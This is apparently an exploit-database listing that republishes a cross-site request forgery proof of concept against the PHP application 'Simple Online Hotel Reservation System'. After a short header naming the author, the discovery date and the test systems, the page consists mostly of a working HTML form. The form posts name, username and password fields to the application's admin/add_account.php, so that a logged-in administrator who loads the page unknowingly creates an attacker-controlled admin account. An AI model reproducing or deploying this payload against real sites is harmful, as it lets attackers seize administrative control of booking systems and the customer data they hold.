simple online hotel reservation system crosssite request forgery (add admin)
▸▸▸ Exploit & Vulnerability >> webapps exploit & php vulnerability
# Exploit Title: Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin) # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: February 25, 2019 # Vendor Homepage: https://code-projects.org/ # Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/ # Tested on: Kali linux, Windows 8.1 # PoC: <html> <head> <title>Add Admin</title> </head> <body> <form method = "POST" action="http://localhost/[PATH]/admin/add_account.php"> <label>Name </label> <input type = "text" name = "name" /><br><br> <label>Username </label> <input type = "text" name = "username" /><br><br> <label>Password </label> <input type = "password" name = "password" /><br><br> <button name = "add_account">Saved</button> </div> </form> </body> </html>
Simple online hotel reservation system crosssite request forgery (add admin) Vulnerability / Exploit Source : Simple online hotel reservation system crosssite request forgery (add admin)